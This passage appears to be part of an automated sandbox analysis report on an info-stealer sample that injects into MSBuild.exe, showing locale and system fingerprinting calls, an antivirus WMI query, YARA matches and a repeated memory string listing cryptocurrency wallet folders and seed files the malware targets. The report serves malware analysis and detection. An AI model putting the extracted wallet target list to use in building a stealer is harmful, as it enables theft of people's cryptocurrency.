Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetLocaleInfoW, 0_2_0090C6EB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0090C814
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0090C9E9
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: GetLocaleInfoW, 0_2_0090C91A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free, 0_2_00946A48
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_00947B38
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00945DBC
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: EnumSystemLocalesW, 0_2_00905D7F
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 0_2_00946D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 3_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 3_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 3_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 3_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 3_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 3_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 3_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 3_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 3_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 3_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 3_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 3_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 3_2_0042E7C4
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 10_2_00D1C085
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetLocaleInfoW, 10_2_00D1622B
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: EnumSystemLocalesW, 10_2_00D1C372
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: EnumSystemLocalesW, 10_2_00D1C327
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 10_2_00D1C498
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: EnumSystemLocalesW, 10_2_00D1C40D
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetLocaleInfoW, 10_2_00D1C6EB
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 10_2_00D1C814
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 10_2_00D1C9E9
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: GetLocaleInfoW, 10_2_00D1C91A
Source: C:\ProgramData\KEGIDHJKKJ.exe Code function: EnumSystemLocalesW, 10_2_00D15D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe Code function: 0_2_008F7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_008F7815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 3_2_00410C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 3_2_00410D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 11.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2205515395.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000003.00000002.2174458155.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: |0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
